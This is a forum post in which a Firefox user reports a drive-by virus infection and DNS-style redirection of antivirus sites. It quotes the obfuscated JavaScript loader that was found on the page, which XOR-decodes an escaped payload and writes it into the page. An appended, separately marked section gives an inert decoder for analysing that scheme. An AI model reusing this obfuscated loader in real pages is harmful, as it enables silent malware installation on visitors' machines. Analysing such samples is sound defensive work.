JavaScript Firefox Virus - Ramnit?

Yesterday Firefox allowed a virus to be installed through some JavaScript embedded on a page (below), despite having Avira and Security Essentials installed. Security Essentials after a full scan did however remove it, but with great inconvenience.

How on earth did this happen :confused:

Secondly, traffic to antivirus sites is being redirected to 127.0.0.1, but my HOSTS file is clean? Anywhere else I can look?

Code:
<script language='javascript'>var ewjiRNjmidvKoG='';WIMAZQPMxKxqknA='iHEcfS';var IqffjkAHo='jpwfEKWZbKHJzegTnSUTESWQujKdnRjXXQ';ylHHsiYQHIaPXHLWv='iyfGL';var upReKQvtmF=0;urNBMhiClQJSn='gkpWdT';var DsUUJQDkuAybtumCCfF='%4C%1E%66%37%2A%3A%3F%42%38%3A%29%47%47%0F%20%1A%23%6F%7B%6A%3D%32%23%58%0B%27%08%0B%20%44%37%2A%36%45%19%19%48%26%2C%3E%65%06%2E%2E%2B%0F%09%13%76%4E%35%27%35%28%36%35%3E%07%0E%2E%16%53%70%5A%7A%78%22%09%02%18%0A%29%22%39%3D%5F%69%26%25%58%45%0F%31%07%34%3D%20%78%71%66%73%55%1D%22%64%1A%3A%57%7A%69%73%4A%18%04%16%24%28%32%67%40%7A%6A%6A%0C%16%17%35%0D%36%68%76%74%71%77%3C%14%18%2C%0D%6E%25%03%3C%2C%39%57%52%47%44%65%26%36%28%05%22%26%22%1F%0C%67%3C%1A%6E%77%64%67%6D%6B%7E%1C%0C%39%05%03%37%54';tNZgZLbHExemhLK='GvZXxXwSSrDHywfWW';var YosCfDQXijJkMDP=DsUUJQDkuAybtumCCfF.length/3;IlZBYHGeUUNDJLapsbsm='SURgNCIJhZhmPmoyBDXNNx';DsUUJQDkuAybtumCCfF=unescape(DsUUJQDkuAybtumCCfF);UIvEdENLdScmkQKUjk='eKyjZLHyD';for(DeuIEsJXCIMaxHgXxVtwZs=0;DeuIEsJXCIMaxHgXxVtwZs<YosCfDQXijJkMDP;DeuIEsJXCIMaxHgXxVtwZs++){upReKQvtmF++;if(IqffjkAHo.length<=upReKQvtmF) upReKQvtmF=0;WszHMY=DsUUJQDkuAybtumCCfF.charCodeAt(DeuIEsJXCIMaxHgXxVtwZs); TrTgSjVLBgEHcZODeO='wcoYzlwCqQIWyrkzdORhfQC'; if(IqffjkAHo.charCodeAt(upReKQvtmF)!=WszHMY) WszHMY^=IqffjkAHo.charCodeAt(upReKQvtmF); goZMVdrRqfaRiXWfZEQdMeBo='SzEhKIQFgWMaqrCXm';ewjiRNjmidvKoG+=String.fromCharCode(WszHMY);} MJiRsETaWCMkbvgczphog='EtrwuSVKPLZg';document.write(ewjiRNjmidvKoG);nfKvvuWAHwGmawGVlLAHNHSOq='uqzMywr';</script>
 
I checked out the plugins and it seems the version of Flash had vulnerabilities, nice of Firefox to tell me that, isn't it :rolleyes:

I can't think to imagine how the poor computer-illiterate souls of the country get on.
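
Added example, not part of the original post: a static decoder for the scheme the posted script uses (percent-escaped bytes XORed against a rolling key, then handed to document.write), returning the decoded markup as an inert string instead of rendering it. The function names, key and sample input are constructed for illustration.

```javascript
// Static decoder for the escape + rolling-XOR scheme used by the posted script.
// Names and sample are constructed; nothing is eval'd or written to a page.

// Turn '%4C%1E...' into byte values without calling unescape().
function percentToBytes(escaped) {
  const bytes = [];
  const re = /%([0-9A-Fa-f]{2})/g;
  let m;
  while ((m = re.exec(escaped)) !== null) bytes.push(parseInt(m[1], 16));
  if (bytes.length * 3 !== escaped.length) throw new Error('input is not pure %XX');
  return bytes;
}

// Same loop as the posted script: the key index is incremented before use
// (so it starts at 1) and wraps to 0; a byte equal to the key character is
// passed through unchanged instead of being XORed.
function xorWithKey(bytes, key) {
  let k = 0;
  return bytes.map((b) => {
    k++;
    if (key.length <= k) k = 0;
    const kc = key.charCodeAt(k);
    return b !== kc ? b ^ kc : b;
  });
}

function decode(escaped, key) {
  const text = String.fromCharCode(...xorWithKey(percentToBytes(escaped), key));
  // Report what the markup references, as plain strings for triage.
  return {
    text,
    tags: [...text.matchAll(/<\s*([a-zA-Z]+)/g)].map((t) => t[1].toLowerCase()),
    urls: text.match(/https?:\/\/[^\s"'<>]+/g) || [],
  };
}

// Constructed test input: the transform is its own inverse for non-NUL text.
function encodeSample(plain, key) {
  const bytes = xorWithKey([...plain].map((c) => c.charCodeAt(0)), key);
  return bytes.map((b) => '%' + b.toString(16).toUpperCase().padStart(2, '0')).join('');
}

const SAMPLE_KEY = 'kEyConstructed';
const SAMPLE_PLAIN = '<a href="http://example.invalid/">constructed sample</a>';
const result = decode(encodeSample(SAMPLE_PLAIN, SAMPLE_KEY), SAMPLE_KEY);
console.log(result);
```

The junk string assignments interleaved in the posted script play no part in the decoding, so only the key, the escaped data and the loop need to be carried over.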
 